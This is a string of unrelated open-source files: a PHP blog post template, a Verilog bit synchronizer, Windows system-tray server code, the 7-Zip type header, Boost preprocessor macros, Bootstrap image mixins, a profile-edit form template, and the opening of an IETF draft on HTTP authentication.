<?php if($this->user->hasLogin()): ?>
<sup><a target="_blank" href="<?php echo $this->options->adminUrl.'write-page.php?cid='.$this->cid;?>" class="footnote-ref"><i class="fa fa-edit"></i></a></sup>
<?php endif;?>
</h1>
<?php endif; ?>
<?php if(!($this->fields->type=='1') && ($this->fields->banner && $this->fields->banner!='')): ?>
<div class="post-item-header flex align-items-center" style="padding: 0;font-size:14px;overflow:hidden">
<span style="white-space:nowrap;text-overflow:ellipsis;overflow:hidden"><b><i class="fa fa-pencil"></i> <?php echo $this->author->screenName; ?></b> • <?php Utils::exportPostMeta($this,$this->fields->type); ?></span>
</div>
<?php endif; ?>
<?php if($this->fields->showTOC=='1'):?>
<?php
$parsed=Utils::parseTOC(Utils::parseAll($this->content));
$GLOBALS['TOC_O']=$parsed['toc'];
echo $parsed['content'];
?>
<?php else :?>
<?php echo Utils::parseAll($this->content,true); ?>
<?php endif; ?>
</article>
</div>
<div class="post-item-footer">
<?php if(Utils::isPluginAvailable('Like')):?>
<span class="like-button"><a href="javascript:;" class="post-like" data-pid="<?php echo $this->cid;?>">
<i class="fa fa-heart"></i> LIKE <span class="like-num"><?php Like_Plugin::theLike($link = false,$this);?></span>
</a></span>
<?php endif; ?>
<span>Tags:<?php $this->tags(',', true, 'none'); ?></span>
</div>
</div>
<?php endif; ?>
</div>
<!--post-item end-->
<div class="post-item" style="animation-delay:0.2s">
<div class="post-pager">
<?php Utils::thePrev($this);?>
<?php if($this->options->reward_img&&$this->options->reward_img!=''):?>
<div class="post-pager-item post-pager-reward" data-title="如果觉得不错就赞赏一下吧~"><a data-fancybox data-src="#reward" href="javascript:;"><i class="fa fa-gift"></i> 打赏</a></div>
<?php endif;?>
<?php Utils::theNext($this);?>
</div>
</div>
<?php $this->need('comments.php'); ?>
<?php $this->need('footer-info.php'); ?>
</div>
<?php $this->need('nav-left.php'); ?>
<?php if($this->options->bloglayout!='1'):?>
<?php $this->need('aside.php'); ?>
<?php endif;?>
</div>
<?php $this->need('footer.php'); ?> | {
"pile_set_name": "Github"
} |
// Copyright Jamie Iles, 2017
//
// This file is part of s80x86.
//
// s80x86 is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// s80x86 is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with s80x86. If not, see <http://www.gnu.org/licenses/>.
`default_nettype none
module BitSync(input logic clk,
input logic reset,
input logic d,
output logic q);
`ifdef verilator
reg p1;
reg p2;
assign q = p2;
always_ff @(posedge clk or posedge reset)
if (reset)
p1 <= 1'b0;
else
p1 <= d;
always_ff @(posedge clk or posedge reset)
if (reset)
p2 <= 1'b0;
else
p2 <= p1;
`else
altera_std_synchronizer sync(.clk(clk),
.reset_n(~reset),
.din(d),
.dout(q));
`endif
endmodule
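
// Illustrative instantiation sketch (not from the original file; the
// surrounding signal names are assumptions):
//
//   BitSync button_sync_inst (
//       .clk   (clk),
//       .reset (reset),
//       .d     (button_async),    // asynchronous input pin
//       .q     (button_synced)    // safe to sample in the clk domain
//   );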
| {
"pile_set_name": "Github"
} |
#ifdef WIN32
#include "inexor/shared/cube_types.hpp"
#include "inexor/shared/cube_unicode.hpp"
#include "inexor/shared/cube_loops.hpp"
#include "inexor/shared/cube_vector.hpp"
#include "inexor/shared/cube_queue.hpp"
#include "inexor/io/Logging.hpp"
#include "inexor/io/Error.hpp"
#include <windows.h>
#include <shellapi.h>
#define LOGSTRLEN 512
#define IDI_ICON1 1
static string apptip = "";
static HINSTANCE appinstance = NULL;
static ATOM wndclass = 0;
static HWND appwindow = NULL, conwindow = NULL;
static HICON appicon = NULL;
static HMENU appmenu = NULL;
static HANDLE outhandle = NULL;
static const int MAXLOGLINES = 200;
struct logline { int len; char buf[LOGSTRLEN]; };
static queue<logline, MAXLOGLINES> loglines;
static void cleanupsystemtray()
{
NOTIFYICONDATA nid;
memset(&nid, 0, sizeof(nid));
nid.cbSize = sizeof(nid);
nid.hWnd = appwindow;
nid.uID = IDI_ICON1;
Shell_NotifyIcon(NIM_DELETE, &nid);
}
static bool setupsystemtray(UINT uCallbackMessage)
{
NOTIFYICONDATA nid;
memset(&nid, 0, sizeof(nid));
nid.cbSize = sizeof(nid);
nid.hWnd = appwindow;
nid.uID = IDI_ICON1;
nid.uCallbackMessage = uCallbackMessage;
nid.uFlags = NIF_MESSAGE | NIF_ICON | NIF_TIP;
nid.hIcon = appicon;
strcpy(nid.szTip, apptip);
if(Shell_NotifyIcon(NIM_ADD, &nid) != TRUE)
return false;
atexit(cleanupsystemtray);
return true;
}
#if 0
static bool modifysystemtray()
{
NOTIFYICONDATA nid;
memset(&nid, 0, sizeof(nid));
nid.cbSize = sizeof(nid);
nid.hWnd = appwindow;
nid.uID = IDI_ICON1;
nid.uFlags = NIF_TIP;
strcpy(nid.szTip, apptip);
return Shell_NotifyIcon(NIM_MODIFY, &nid) == TRUE;
}
#endif
static void cleanupwindow()
{
if(!appinstance) return;
if(appmenu)
{
DestroyMenu(appmenu);
appmenu = NULL;
}
if(wndclass)
{
UnregisterClass(MAKEINTATOM(wndclass), appinstance);
wndclass = 0;
}
}
static BOOL WINAPI consolehandler(DWORD dwCtrlType)
{
switch(dwCtrlType)
{
case CTRL_C_EVENT:
case CTRL_BREAK_EVENT:
case CTRL_CLOSE_EVENT:
exit(EXIT_SUCCESS);
return TRUE;
}
return FALSE;
}
static void writeline(logline &line)
{
static uchar ubuf[512];
size_t len = strlen(line.buf), carry = 0;
while(carry < len)
{
size_t numu = encodeutf8(ubuf, sizeof(ubuf), &((uchar *)line.buf)[carry], len - carry, &carry);
DWORD written = 0;
WriteConsole(outhandle, ubuf, numu, &written, NULL);
}
}
static void setupconsole()
{
if(conwindow) return;
if(!AllocConsole()) return;
SetConsoleCtrlHandler(consolehandler, TRUE);
conwindow = GetConsoleWindow();
SetConsoleTitle(apptip);
//SendMessage(conwindow, WM_SETICON, ICON_SMALL, (LPARAM)appicon);
SendMessage(conwindow, WM_SETICON, ICON_BIG, (LPARAM)appicon);
outhandle = GetStdHandle(STD_OUTPUT_HANDLE);
CONSOLE_SCREEN_BUFFER_INFO coninfo;
GetConsoleScreenBufferInfo(outhandle, &coninfo);
coninfo.dwSize.Y = MAXLOGLINES;
SetConsoleScreenBufferSize(outhandle, coninfo.dwSize);
SetConsoleCP(CP_UTF8);
SetConsoleOutputCP(CP_UTF8);
loopv(loglines) writeline(loglines[i]);
}
enum
{
MENU_OPENCONSOLE = 0,
MENU_SHOWCONSOLE,
MENU_HIDECONSOLE,
MENU_EXIT
};
static LRESULT CALLBACK handlemessages(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
switch(uMsg)
{
case WM_APP:
SetForegroundWindow(hWnd);
switch(lParam)
{
//case WM_MOUSEMOVE:
// break;
case WM_LBUTTONUP:
case WM_RBUTTONUP:
{
POINT pos;
GetCursorPos(&pos);
TrackPopupMenu(appmenu, TPM_CENTERALIGN|TPM_BOTTOMALIGN|TPM_RIGHTBUTTON, pos.x, pos.y, 0, hWnd, NULL);
PostMessage(hWnd, WM_NULL, 0, 0);
break;
}
}
return 0;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case MENU_OPENCONSOLE:
setupconsole();
if(conwindow) ModifyMenu(appmenu, 0, MF_BYPOSITION|MF_STRING, MENU_HIDECONSOLE, "Hide Console");
break;
case MENU_SHOWCONSOLE:
ShowWindow(conwindow, SW_SHOWNORMAL);
ModifyMenu(appmenu, 0, MF_BYPOSITION|MF_STRING, MENU_HIDECONSOLE, "Hide Console");
break;
case MENU_HIDECONSOLE:
ShowWindow(conwindow, SW_HIDE);
ModifyMenu(appmenu, 0, MF_BYPOSITION|MF_STRING, MENU_SHOWCONSOLE, "Show Console");
break;
case MENU_EXIT:
PostMessage(hWnd, WM_CLOSE, 0, 0);
break;
}
return 0;
case WM_CLOSE:
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hWnd, uMsg, wParam, lParam);
}
static void setupwindow(const char *title)
{
copystring(apptip, title);
//appinstance = GetModuleHandle(NULL);
if(!appinstance) fatal("failed getting application instance");
appicon = LoadIcon(appinstance, MAKEINTRESOURCE(IDI_ICON1));//(HICON)LoadImage(appinstance, MAKEINTRESOURCE(IDI_ICON1), IMAGE_ICON, 0, 0, LR_DEFAULTSIZE);
if(!appicon) Log.start_stop->error("failed loading icon");
appmenu = CreatePopupMenu();
if(!appmenu) fatal("failed creating popup menu");
AppendMenu(appmenu, MF_STRING, MENU_OPENCONSOLE, "Open Console");
AppendMenu(appmenu, MF_SEPARATOR, 0, NULL);
AppendMenu(appmenu, MF_STRING, MENU_EXIT, "Exit");
//SetMenuDefaultItem(appmenu, 0, FALSE);
WNDCLASS wc;
memset(&wc, 0, sizeof(wc));
wc.hCursor = NULL; //LoadCursor(NULL, IDC_ARROW);
wc.hIcon = appicon;
wc.lpszMenuName = NULL;
wc.lpszClassName = title;
wc.style = 0;
wc.hInstance = appinstance;
wc.lpfnWndProc = handlemessages;
wc.cbWndExtra = 0;
wc.cbClsExtra = 0;
wndclass = RegisterClass(&wc);
if(!wndclass) fatal("failed registering window class");
appwindow = CreateWindow(MAKEINTATOM(wndclass), title, 0, CW_USEDEFAULT, CW_USEDEFAULT, 0, 0, HWND_MESSAGE, NULL, appinstance, NULL);
if(!appwindow) fatal("failed creating window");
atexit(cleanupwindow);
if(!setupsystemtray(WM_APP)) fatal("failed adding to system tray");
}
static char *parsecommandline(const char *src, vector<char *> &args)
{
char *buf = new char[strlen(src) + 1], *dst = buf;
for(;;)
{
while(isspace(*src)) src++;
if(!*src) break;
args.add(dst);
for(bool quoted = false; *src && (quoted || !isspace(*src)); src++)
{
if(*src != '"') *dst++ = *src;
else if(dst > buf && src[-1] == '\\') dst[-1] = '"';
else quoted = !quoted;
}
*dst++ = '\0';
}
args.add(NULL);
return buf;
}
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR szCmdLine, int sw)
{
vector<char *> args;
char *buf = parsecommandline(GetCommandLine(), args);
appinstance = hInst;
setupwindow("Inexor server");
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
extern int standalonemain(int argc, char **argv);
int status = standalonemain(args.length()-1, args.getbuf());
delete[] buf;
exit(status);
return 0;
}
#endif
| {
"pile_set_name": "Github"
} |
/* Types.h -- Basic types
2008-11-23 : Igor Pavlov : Public domain */
#ifndef __7Z_TYPES_H
#define __7Z_TYPES_H
#include <stddef.h>
#ifdef _WIN32
#include <windows.h>
#endif
#define SZ_OK 0
#define SZ_ERROR_DATA 1
#define SZ_ERROR_MEM 2
#define SZ_ERROR_CRC 3
#define SZ_ERROR_UNSUPPORTED 4
#define SZ_ERROR_PARAM 5
#define SZ_ERROR_INPUT_EOF 6
#define SZ_ERROR_OUTPUT_EOF 7
#define SZ_ERROR_READ 8
#define SZ_ERROR_WRITE 9
#define SZ_ERROR_PROGRESS 10
#define SZ_ERROR_FAIL 11
#define SZ_ERROR_THREAD 12
#define SZ_ERROR_ARCHIVE 16
#define SZ_ERROR_NO_ARCHIVE 17
typedef int SRes;
#ifdef _WIN32
typedef DWORD WRes;
#else
typedef int WRes;
#endif
#ifndef RINOK
#define RINOK(x) { int __result__ = (x); if (__result__ != 0) return __result__; }
#endif
typedef unsigned char Byte;
typedef short Int16;
typedef unsigned short UInt16;
#ifdef _LZMA_UINT32_IS_ULONG
typedef long Int32;
typedef unsigned long UInt32;
#else
typedef int Int32;
typedef unsigned int UInt32;
#endif
#ifdef _SZ_NO_INT_64
/* define _SZ_NO_INT_64, if your compiler doesn't support 64-bit integers.
NOTES: Some code will work incorrectly in that case! */
typedef long Int64;
typedef unsigned long UInt64;
#else
#if defined(_MSC_VER) || defined(__BORLANDC__)
typedef __int64 Int64;
typedef unsigned __int64 UInt64;
#else
typedef long long int Int64;
typedef unsigned long long int UInt64;
#endif
#endif
#ifdef _LZMA_NO_SYSTEM_SIZE_T
typedef UInt32 SizeT;
#else
typedef size_t SizeT;
#endif
typedef int Bool;
#define True 1
#define False 0
#ifdef _MSC_VER
#if _MSC_VER >= 1300
#define MY_NO_INLINE __declspec(noinline)
#else
#define MY_NO_INLINE
#endif
#define MY_CDECL __cdecl
#define MY_STD_CALL __stdcall
#define MY_FAST_CALL MY_NO_INLINE __fastcall
#else
#define MY_CDECL
#define MY_STD_CALL
#define MY_FAST_CALL
#endif
/* The following interfaces use first parameter as pointer to structure */
typedef struct
{
SRes (*Read)(void *p, void *buf, size_t *size);
/* if (input(*size) != 0 && output(*size) == 0) means end_of_stream.
(output(*size) < input(*size)) is allowed */
} ISeqInStream;
/* it can return SZ_ERROR_INPUT_EOF */
SRes SeqInStream_Read(ISeqInStream *stream, void *buf, size_t size);
SRes SeqInStream_Read2(ISeqInStream *stream, void *buf, size_t size, SRes errorType);
SRes SeqInStream_ReadByte(ISeqInStream *stream, Byte *buf);
typedef struct
{
size_t (*Write)(void *p, const void *buf, size_t size);
/* Returns: result - the number of actually written bytes.
(result < size) means error */
} ISeqOutStream;
typedef enum
{
SZ_SEEK_SET = 0,
SZ_SEEK_CUR = 1,
SZ_SEEK_END = 2
} ESzSeek;
typedef struct
{
SRes (*Read)(void *p, void *buf, size_t *size); /* same as ISeqInStream::Read */
SRes (*Seek)(void *p, Int64 *pos, ESzSeek origin);
} ISeekInStream;
typedef struct
{
SRes (*Look)(void *p, void **buf, size_t *size);
/* if (input(*size) != 0 && output(*size) == 0) means end_of_stream.
(output(*size) > input(*size)) is not allowed
(output(*size) < input(*size)) is allowed */
SRes (*Skip)(void *p, size_t offset);
/* offset must be <= output(*size) of Look */
SRes (*Read)(void *p, void *buf, size_t *size);
/* reads directly (without buffer). It's same as ISeqInStream::Read */
SRes (*Seek)(void *p, Int64 *pos, ESzSeek origin);
} ILookInStream;
SRes LookInStream_LookRead(ILookInStream *stream, void *buf, size_t *size);
SRes LookInStream_SeekTo(ILookInStream *stream, UInt64 offset);
/* reads via ILookInStream::Read */
SRes LookInStream_Read2(ILookInStream *stream, void *buf, size_t size, SRes errorType);
SRes LookInStream_Read(ILookInStream *stream, void *buf, size_t size);
#define LookToRead_BUF_SIZE (1 << 14)
typedef struct
{
ILookInStream s;
ISeekInStream *realStream;
size_t pos;
size_t size;
Byte buf[LookToRead_BUF_SIZE];
} CLookToRead;
void LookToRead_CreateVTable(CLookToRead *p, int lookahead);
void LookToRead_Init(CLookToRead *p);
typedef struct
{
ISeqInStream s;
ILookInStream *realStream;
} CSecToLook;
void SecToLook_CreateVTable(CSecToLook *p);
typedef struct
{
ISeqInStream s;
ILookInStream *realStream;
} CSecToRead;
void SecToRead_CreateVTable(CSecToRead *p);
typedef struct
{
SRes (*Progress)(void *p, UInt64 inSize, UInt64 outSize);
/* Returns: result. (result != SZ_OK) means break.
Value (UInt64)(Int64)-1 for size means unknown value. */
} ICompressProgress;
typedef struct
{
void *(*Alloc)(void *p, size_t size);
void (*Free)(void *p, void *address); /* address can be 0 */
} ISzAlloc;
#define IAlloc_Alloc(p, size) (p)->Alloc((p), size)
#define IAlloc_Free(p, a) (p)->Free((p), a)
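
/* Illustrative sketch (not part of the original header): a minimal
   malloc/free-based ISzAlloc, assuming <stdlib.h> is available.

   static void *SzAlloc(void *p, size_t size) { (void)p; return malloc(size); }
   static void SzFree(void *p, void *address) { (void)p; free(address); }
   static ISzAlloc g_Alloc = { SzAlloc, SzFree };

   A decoder can then allocate through the interface with
   IAlloc_Alloc(&g_Alloc, size) and release with IAlloc_Free(&g_Alloc, ptr). */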
#endif
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2009-2012 Lorenzo Caminiti
// Distributed under the Boost Software License, Version 1.0
// (see accompanying file LICENSE_1_0.txt or a copy at
// http://www.boost.org/LICENSE_1_0.txt)
// Home at http://www.boost.org/libs/local_function
#ifndef BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_HPP_
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_HPP_
#include <boost/local_function/detail/preprocessor/keyword/facility/is.hpp>
#include <boost/local_function/detail/preprocessor/keyword/facility/add.hpp>
#include <boost/local_function/detail/preprocessor/keyword/facility/remove.hpp>
// PRIVATE //
// These are not local macros -- DO NOT #UNDEF.
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_IS_default (1)/* unary */
#define default_BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_IS (1)/* unary */
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_default/*nothing*/
#define default_BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE/*nothing*/
// PUBLIC //
// Is.
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_FRONT(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_IS_FRONT(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_IS_)
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_BACK(token) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_IS_BACK(token, \
_BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_IS)
// Remove.
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_FRONT(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_REMOVE_FRONT(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_FRONT, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_)
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_BACK(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_REMOVE_BACK(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_BACK, \
_BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE)
// Add.
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_ADD_FRONT(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_ADD_FRONT(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_FRONT, default)
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_ADD_BACK(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_ADD_BACK(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_BACK, default)
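
// Illustrative usage sketch (not part of the original header; the expansions
// shown are what the keyword facility is expected to yield):
//
//   BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_FRONT(default x)     // 1
//   BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_FRONT(int x)         // 0
//   BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_FRONT(default x) // x
//   BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_ADD_FRONT(x)            // default x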
#endif // #include guard
| {
"pile_set_name": "Github"
} |
// Image Mixins
// - Responsive image
// - Retina image
// Responsive image
//
// Keep images from scaling beyond the width of their parents.
@mixin img-fluid {
// Part 1: Set a maximum relative to the parent
max-width: 100%;
// Part 2: Override the height to auto, otherwise images will be stretched
// when setting a width and height attribute on the img element.
height: auto;
}
// Retina image
//
// Short retina mixin for setting background-image and -size.
@mixin img-retina($file-1x, $file-2x, $width-1x, $height-1x) {
background-image: url($file-1x);
// Autoprefixer takes care of adding -webkit-min-device-pixel-ratio and -o-min-device-pixel-ratio,
// but doesn't convert dppx=>dpi.
// There's no such thing as unprefixed min-device-pixel-ratio since it's nonstandard.
// Compatibility info: https://caniuse.com/#feat=css-media-resolution
@media only screen and (min-resolution: 192dpi), // IE9-11 don't support dppx
only screen and (min-resolution: 2dppx) { // Standardized
background-image: url($file-2x);
background-size: $width-1x $height-1x;
}
@include deprecate("`img-retina()`", "v4.3.0", "v5");
}
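
// Illustrative usage sketch (not part of the original partial; the selector
// and file names below are made up). Note that img-retina() is deprecated,
// as the @include deprecate call above indicates.
//
// .brand-logo {
//   @include img-fluid;
//   @include img-retina("../img/logo.png", "../img/logo@2x.png", 120px, 40px);
// }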
| {
"pile_set_name": "Github"
} |
<div style="padding:20px">
<form method="post" action="#{ActionLink}" class="ajaxPostForm">
<table style="width: 95%; ">
<tr>
<td valign="top" class="profile_panel">
<table border="0" style="">
<tr>
<td class="tdLeft">_{nickName}</td>
<td><span class="strong">#{m.NickName}</span><span class="note left5">(ID:#{m.Id})</span></td>
</tr>
<tr>
<td class="tdLeft">_{realName}</td>
<td><input name="Name" type="text" value="#{m.Name}">
<span class="left10">空间名称 <input name="Title" type="text" value="#{m.Title}"> <span class="note">(最长20个字)</span> </span>
</td>
</tr>
<tr>
<td class="tdLeft">_{birthday}</td>
<td>#{Year} #{Month} #{Day}</td>
</tr>
<tr>
<td class="tdLeft">_{gender}</td>
<td>#{Gender}
<span class="left10">_{zodiac}#{Zodiac}</span>
<span class="left10">_{blood}#{Blood}</span>
<span class="left10">_{relationship}#{Relationship}</span>
<span class="left10">_{degree}#{Degree}</span>
</td>
</tr>
<tr>
<td class="tdLeft"> </td>
<td> </td>
</tr>
<tr>
<td class="tdLeft">_{registerReason}</td>
<td>#{Purpose}</td>
</tr>
<tr>
<td class="tdLeft">_{hometown}</td>
<td>#{ProvinceId1}
<input name="City1" type="text" value="#{m.City1}" style="width: 82px"></td>
</tr>
<tr>
<td class="tdLeft">_{region}</td>
<td>#{ProvinceId2}
<input name="City2" type="text" value="#{m.City2}" style="width: 82px"></td>
</tr>
</table>
</td>
</tr>
<!-- BEGIN sexyInfo -->
<!-- END sexyInfo -->
<tr><td colspan="2"> </td></tr>
<tr>
<td valign="top" class="profile_panel" colspan="2">
_{selfIntroductionTip}
<span class="note">(长度:_{fromChar} #{m.UserDescriptionMin} _{toChar} #{m.UserDescriptionMax})</span>
<br>
<textarea name="Description" style="width: 90%; height: 96px">#{m.Description}</textarea>
<br /><br/>
_{signatureTip}
<span class="note">(长度:长度:_{fromChar} #{m.UserSignatureMin} _{toChar} #{m.UserSignatureMax})</span>
<br>
<textarea name="Signature" style="width: 90%; height: 106px">#{m.Signature}</textarea>
</td>
</tr>
</table>
<div style="margin-left:120px;">
<input name="Submit1" type="submit" class="btnSave btn" value="_{saveUpdate}">
</div>
</form>
</div>
| {
"pile_set_name": "Github"
} |
HTTPbis Working Group R. Fielding, Ed.
Internet-Draft Adobe
Obsoletes: 2616 (if approved) J. Gettys
Updates: 2617 (if approved) Alcatel-Lucent
Intended status: Standards Track J. Mogul
Expires: October 20, 2011 HP
H. Frystyk
Microsoft
L. Masinter
Adobe
P. Leach
Microsoft
T. Berners-Lee
W3C/MIT
Y. Lafon, Ed.
W3C
J. Reschke, Ed.
greenbytes
April 18, 2011
HTTP/1.1, part 7: Authentication
draft-ietf-httpbis-p7-auth-14
Abstract
The Hypertext Transfer Protocol (HTTP) is an application-level
protocol for distributed, collaborative, hypermedia information
systems. HTTP has been in use by the World Wide Web global
information initiative since 1990. This document is Part 7 of the
seven-part specification that defines the protocol referred to as
"HTTP/1.1" and, taken together, obsoletes RFC 2616. Part 7 defines
HTTP Authentication.
Editorial Note (To be removed by RFC Editor)
Discussion of this draft should take place on the HTTPBIS working
group mailing list ([email protected]), which is archived at
<http://lists.w3.org/Archives/Public/ietf-http-wg/>.
The current issues list is at
<http://tools.ietf.org/wg/httpbis/trac/report/3> and related
documents (including fancy diffs) can be found at
<http://tools.ietf.org/wg/httpbis/>.
The changes in this draft are summarized in Appendix C.15.
Status of This Memo
This Internet-Draft is submitted in full conformance with the
provisions of BCP 78 and BCP 79.
Internet-Drafts are working documents of the Internet Engineering
Task Force (IETF). Note that other groups may also distribute
working documents as Internet-Drafts. The list of current Internet-
Drafts is at http://datatracker.ietf.org/drafts/current/.
Internet-Drafts are draft documents valid for a maximum of six months
and may be updated, replaced, or obsoleted by other documents at any
time. It is inappropriate to use Internet-Drafts as reference
material or to cite them other than as "work in progress."
This Internet-Draft will expire on October 20, 2011.
Copyright Notice
Copyright (c) 2011 IETF Trust and the persons identified as the
document authors. All rights reserved.
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(http://trustee.ietf.org/license-info) in effect on the date of
publication of this document. Please review these documents
carefully, as they describe your rights and restrictions with respect
to this document. Code Components extracted from this document must
include Simplified BSD License text as described in Section 4.e of
the Trust Legal Provisions and are provided without warranty as
described in the Simplified BSD License.
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s) controlling
the copyright in such materials, this document may not be modified
outside the IETF Standards Process, and derivative works of it may
not be created outside the IETF Standards Process, except to format
it for publication as an RFC or to translate it into languages other
than English.
Table of Contents
1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.1. Requirements . . . . . . . . . . . . . . . . . . . . . . . 4
1.2. Syntax Notation . . . . . . . . . . . . . . . . . . . . . 4
1.2.1. Core Rules . . . . . . . . . . . . . . . . . . . . . . 4
2. Access Authentication Framework . . . . . . . . . . . . . . . 5
2.1. Authentication Scheme Registry . . . . . . . . . . . . . . 7
3. Status Code Definitions . . . . . . . . . . . . . . . . . . . 7
3.1. 401 Unauthorized . . . . . . . . . . . . . . . . . . . . . 7
3.2. 407 Proxy Authentication Required . . . . . . . . . . . . 7
4. Header Field Definitions . . . . . . . . . . . . . . . . . . . 8
4.1. Authorization . . . . . . . . . . . . . . . . . . . . . . 8
4.2. Proxy-Authenticate . . . . . . . . . . . . . . . . . . . . 9
4.3. Proxy-Authorization . . . . . . . . . . . . . . . . . . . 9
4.4. WWW-Authenticate . . . . . . . . . . . . . . . . . . . . . 9
5. IANA Considerations . . . . . . . . . . . . . . . . . . . . . 10
5.1. Authentication Scheme Registry . . . . . . . . . . . . . 10
5.2. Status Code Registration . . . . . . . . . . . . . . . . . 10
5.3. Header Field Registration . . . . . . . . . . . . . . . . 10
6. Security Considerations . . . . . . . . . . . . . . . . . . . 10
6.1. Authentication Credentials and Idle Clients . . . . . . . 11
7. Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . 11
8. References . . . . . . . . . . . . . . . . . . . . . . . . . . 11
8.1. Normative References . . . . . . . . . . . . . . . . . . . 11
8.2. Informative References . . . . . . . . . . . . . . . . . . 12
Appendix A. Changes from RFC 2616 . . . . . . . . . . . . . . . . 12
Appendix B. Collected ABNF . . . . . . . . . . . . . . . . . . . 13
Appendix C. Change Log (to be removed by RFC Editor before
publication) . . . . . . . . . . . . . . . . . . . . 13
C.1. Since RFC 2616 . . . . . . . . . . . . . . . . . . . . . . 13
C.2. Since draft-ietf-httpbis-p7-auth-00 . . . . . . . . . . . 13
C.3. Since draft-ietf-httpbis-p7-auth-01 . . . . . . . . . . . 14
C.4. Since draft-ietf-httpbis-p7-auth-02 . . . . . . . . . . . 14
C.5. Since draft-ietf-httpbis-p7-auth-03 . . . . . . . . . . . 14
C.6. Since draft-ietf-httpbis-p7-auth-04 . . . . . . . . . . . 14
C.7. Since draft-ietf-httpbis-p7-auth-05 . . . . . . . . . . . 14
C.8. Since draft-ietf-httpbis-p7-auth-06 . . . . . . . . . . . 14
C.9. Since draft-ietf-httpbis-p7-auth-07 . . . . . . . . . . . 15
C.10. Since draft-ietf-httpbis-p7-auth-08 . . . . . . . . . . . 15
C.11. Since draft-ietf-httpbis-p7-auth-09 . . . . . . . . . . . 15
C.12. Since draft-ietf-httpbis-p7-auth-10 . . . . . . . . . . . 15
C.13. Since draft-ietf-httpbis-p7-auth-11 . . . . . . . . . . . 15
C.14. Since draft-ietf-httpbis-p7-auth-12 . . . . . . . . . . . 15
C.15. Since draft-ietf-httpbis-p7-auth-13 . . . . . . . . . . . 16
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1. Introduction
This document defines HTTP/1.1 access control and authentication. It
includes the relevant parts of RFC 2616 with only minor changes, plus
the general framework for HTTP authentication, as previously defined
in "HTTP Authentication: Basic and Digest Access Authentication"
([RFC2617]).
HTTP provides several OPTIONAL challenge-response authentication
mechanisms which can be used by a server to challenge a client
request and by a client to provide authentication information. The
"basic" and "digest" authentication schemes continue to be specified
in RFC 2617.
1.1. Requirements
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT",
"SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this
document are to be interpreted as described in [RFC2119].
An implementation is not compliant if it fails to satisfy one or more
of the "MUST" or "REQUIRED" level requirements for the protocols it
implements. An implementation that satisfies all the "MUST" or
"REQUIRED" level and all the "SHOULD" level requirements for its
protocols is said to be "unconditionally compliant"; one that
satisfies all the "MUST" level requirements but not all the "SHOULD"
level requirements for its protocols is said to be "conditionally
compliant".
1.2. Syntax Notation
This specification uses the ABNF syntax defined in Section 1.2 of
[Part1] (which extends the syntax defined in [RFC5234] with a list
rule). Appendix B shows the collected ABNF, with the list rule
expanded.
